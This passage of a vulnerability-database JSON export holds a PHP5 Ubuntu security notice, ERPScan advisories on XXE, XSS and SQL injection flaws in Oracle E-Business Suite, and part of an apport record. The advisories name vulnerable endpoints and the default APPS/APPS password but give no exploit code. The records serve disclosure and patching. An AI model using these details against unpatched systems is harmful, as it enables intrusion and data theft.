php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "94aee96d0a33ff770af1ab8e308073f0"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "7591a4414fab4e00d545d96f67923bfe"}, {"key": "href", "hash": "91f326dd520bc78a7e8becd3c39b6be5"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "29738b7846c783fb3a4f2a49b7c4ccd3"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d2381bcd69ce89f633080a3b3bcd22d9c6038a3c2512d85530ef0a4ad6a45bd8", "viewCount": 181, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K17503", "SOL17503"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-7803", "UB:CVE-2015-7804"]}, {"type": "cve", "idList": ["CVE-2015-7803", "CVE-2015-7804"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191984", "OPENVAS:1361412562311220201747", "OPENVAS:1361412562310806649", "OPENVAS:1361412562310120520", "OPENVAS:1361412562311220192438", "OPENVAS:1361412562310703380", "OPENVAS:703380", "OPENVAS:1361412562311220192649", "OPENVAS:1361412562310807000", "OPENVAS:1361412562310806648", "OPENVAS:1361412562310120396", "OPENVAS:1361412562310842508"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3380-1:F94D6", "DEBIAN:DLA-341-1:DA682"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-602.NASL", "DEBIAN_DSA-3380.NASL", "EULEROS_SA-2019-2649.NASL", "PHP_5_5_30.NASL", "UBUNTU_USN-2786-1.NASL", "OPENSUSE-2016-100.NASL", "SUSE_SU-2016-1581-1.NASL", "FREEBSD_PKG_C1DA8B756AEF11E59909002590263BF5.NASL", "OPENSUSE-2016-157.NASL", "EULEROS_SA-2019-1984.NASL", "MACOSX_SECUPD2015-008.NASL", "9325.PRM", "SLACKWARE_SSA_2016-034-04.NASL", "EULEROS_SA-2019-2438.NASL", "SUSE_SU-2016-1638-1.NASL", "WEB_APPLICATION_SCANNING_98806", "GENTOO_GLSA-201606-10.NASL", "8956.PRM", "SUSE_SU-2016-0284-1.NASL", "MACOSX_10_11_2.NASL", "SUSE_SU-2016-1145-1.NASL", "PHP_5_6_14.NASL", "DEBIAN_DLA-341.NASL", "ALA_ALAS-2015-601.NASL", "PFSENSE_SA-15_08.NASL", "EULEROS_SA-2020-1747.NASL"]}, {"type": "ubuntu", "idList": ["USN-2786-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14753"]}, {"type": "freebsd", "idList": ["C1DA8B75-6AEF-11E5-9909-002590263BF5"]}, {"type": "slackware", "idList": ["SSA-2016-034-04"]}, {"type": "hackerone", "idList": ["H1:104008", "H1:103990"]}, {"type": "amazon", "idList": ["ALAS-2015-602", "ALAS-2015-601"]}, {"type": "redhat", "idList": ["RHSA-2016:0457"]}, {"type": "suse", "idList": ["SUSE-SU-2016:1581-1", "SUSE-SU-2016:1145-1", "SUSE-SU-2016:1638-1"]}, {"type": "gentoo", "idList": ["GLSA-201606-10"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32654", "bulletinFamily": "software", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4849"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "05f33ecfa6c5da775ada7be0946e9c35"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "e069b6a0eb846de58d51f6f1caccd76e"}, {"key": "href", "hash": "a034a18d00b9b8f4a3448812c0519f69"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "c9c62536a7dbd3fac9ecbf649050cab1"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "c4015e5d0067bf08940e133c4477451e433581d60a4c9b7745f8b69fced90c4c", "viewCount": 168, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4849"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-029"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32658", "bulletinFamily": "software", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality None &#40;N&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting &#40;XSS&#41; due\r\nto lack of sanitizing the &quot;domain&quot; parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4854"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "4b5a683c958427d1f139ea46960c1f77"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "ac4e2716cd1f40662335b0c2baefa8ac"}, {"key": "href", "hash": "793234d92076d083ca1ba3d060535b33"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "5015d42a9a849429bfd5eccdc891f977"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "d412a2c5f1d57e01c882336bd5b7b03d9bbc5e601468b64828936dded249a019", "viewCount": 182, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4854"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-027"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015", "ORACLE:CPUOCT2015-2367953"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:DOC:32657", "bulletinFamily": "software", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; High &#40;H&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; Single &#40;S&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions &#40;afamexts.sql&#41; does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password &#40;for example,\r\ndefault password APPS/APPS&#41;, he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2015-4846"], "type": "securityvulns", "lastseen": "2018-08-31T11:11:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "2028f4e78a559d181736340a0b1d147d"}, {"key": "cvss", "hash": "2cbf8392c8ba6ad3fc64242f5a2d3294"}, {"key": "description", "hash": "0003d17d2e87c7e0ff565bcbf5cb29db"}, {"key": "href", "hash": "3b52d758a08f078f46108d7d53e82563"}, {"key": "modified", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "published", "hash": "d8f38bedae5c73d95ff296ba2bd86a44"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "79450712fbf162b7be89a44b998f0b41"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "b741a8a189c11460c107071162d0ca6a5c37837c88eb3e8aa27aacd53d2530d3", "viewCount": 165, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-08-31T11:11:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4846"]}, {"type": "erpscan", "idList": ["ERPSCAN-15-026"]}, {"type": "nessus", "idList": ["ORACLE_E-BUSINESS_CPU_OCT_2015.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2018-08-31T11:11:02", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "SECURITYVULNS:VULN:14720", "bulletinFamily": "software", "title": "apport security vulnerabilities", "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "published": "2015-11-02T00:00:00", "modified": "2015-11-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32660", "https://vulners.com/securityvulns/securityvulns:doc:32549"], "cvelist": ["CVE-2015-1338"], "type": "securityvulns", "lastseen": "2021-06-08T18:47:21", "history": [{"bulletin": {"affectedSoftware": [{"name": "Apport", "operator": "eq", "version": "2.18"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-08-31T11:10:02", "references": [{"idList": ["1337DAY-ID-24318"], "type": "zdt"}, {"idList": ["EDB-ID:38353"], "type": "exploitdb"}, {"idList": ["SUSE_SU-2017-1938-1.NASL", "UBUNTU_USN-2744-1.NASL"], "type": "nessus"}, {"idList": ["USN-2744-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310842461"], "type": "openvas"}, 